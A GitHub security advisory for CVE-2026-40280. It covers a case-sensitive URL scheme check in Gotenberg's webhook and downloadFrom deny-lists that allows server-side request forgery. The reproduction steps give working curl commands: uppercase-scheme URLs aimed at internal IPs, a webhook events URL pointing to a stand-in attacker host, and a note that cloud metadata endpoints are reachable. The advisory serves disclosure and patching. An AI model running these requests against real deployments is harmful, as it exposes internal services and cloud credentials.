Skip to content

Gotenberg has case-insensitive URL scheme that bypasses webhook and downloadFrom deny-list SSRF protection

Critical severity GitHub Reviewed Published Apr 30, 2026 in gotenberg/gotenberg • Updated Apr 30, 2026

Package

github.com/gotenberg/gotenberg/v8 (Go)

Affected versions

<= 8.30.1

Patched versions

8.31.0

Description

Vulnerability Details

CWE: CWE-918 - Server-Side Request Forgery (SSRF)

The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally. Affected: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42, pkg/modules/api/api.go:199. Confirmed in Docker: http://172.17.0.1:12345/ returns HTTP 403 (blocked), HTTP://172.17.0.1:12345/ returns HTTP 202 (bypassed, TCP connection attempted). Same pattern as CVE-2026-27018/GHSA-jjwv-57xh-xr6r but in newly added webhook+downloadFrom deny-lists (commit 3f01ca1, 2026-04-07). Affected versions: <= 8.30.1. CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N = 9.1.

Summary

The default private-IP deny-lists for --webhook-deny-list and --api-download-from-deny-list use a case-sensitive regex (^https?://). Any uppercase URL scheme variant (HTTP://, HTTPS://, Http://) bypasses the pattern. Go's net/url.Parse() normalizes the scheme to lowercase when making the outbound TCP connection, so the connection succeeds normally.

The same bypass (case-insensitive scheme) was previously reported for the Chromium deny-list in CVE-2026-27018 (GHSA-jjwv-57xh-xr6r), but the newly added deny-lists for webhook and downloadFrom contain the identical flaw.

Affected file/function: pkg/gotenberg/filter.go:FilterDeadline(), pkg/modules/webhook/webhook.go:42 (default regex), pkg/modules/api/api.go:199 (default regex)

Steps to Reproduce

1. Start Gotenberg:
   docker run --rm -d -p 3001:3000 --name gotenberg-test gotenberg/gotenberg:8

2. Baseline — lowercase http:// is blocked (HTTP 403):
   curl -s -w "\nHTTP %{http_code}" -X POST http://localhost:3001/forms/chromium/convert/url \
     -H "Gotenberg-Webhook-Url: http://172.17.0.1:12345/callback" \
     -H "Gotenberg-Webhook-Events-Url: http://attacker.com/events" \
     -F "url=https://example.com/"

3. Bypass — uppercase HTTP:// bypasses deny-list (HTTP 202, connection attempted):
   curl -s -w "\nHTTP %{http_code}" -X POST http://localhost:3001/forms/chromium/convert/url \
     -H "Gotenberg-Webhook-Url: HTTP://172.17.0.1:12345/callback" \
     -H "Gotenberg-Webhook-Events-Url: http://attacker.com/events" \
     -F "url=https://example.com/"
   # Returns 202 + Gotenberg logs: "Post \"http://172.17.0.1:12345/callback\": connection refused"

4. downloadFrom bypass (response content included in PDF):
   curl -s -w "\nHTTP %{http_code}" http://localhost:3001/forms/chromium/convert/html \
     -F 'files=@/dev/stdin;filename=index.html;type=text/html' \
     -F 'downloadFrom=[{"url":"HTTP://172.17.0.1:12345/secret.html"}]' <<< '<html><body>test</body></html>'
   # Error is "Unable to download file" (connection refused), not "filter URL" — bypass confirmed

Impact

An unauthenticated attacker can access internal network services (private IP ranges, loopback, link-local) that the deny-list was designed to block. The downloadFrom SSRF can exfiltrate content from internal services that respond with Content-Disposition headers. In cloud environments, this could allow access to instance metadata services (e.g., HTTP://169.254.169.254/latest/meta-data/). This bypasses the same security control that was patched in CVE-2026-27018.

Fix

Normalize the URL scheme to lowercase before passing to FilterDeadline, or compile deny-list regexes with the case-insensitive flag ((?i)).

Vulnerable Code

// See description for details

Steps to Reproduce

  1. Set up the application using the default configuration
  2. See the vulnerability details above

Impact

This vulnerability may allow an attacker to compromise the application.

References

@gulien gulien published to gotenberg/gotenberg Apr 30, 2026
Published to the GitHub Advisory Database Apr 30, 2026
Reviewed Apr 30, 2026
Last updated Apr 30, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

EPSS score

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

CVE ID

CVE-2026-40280

GHSA ID

GHSA-5q7p-7jgv-ww56

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.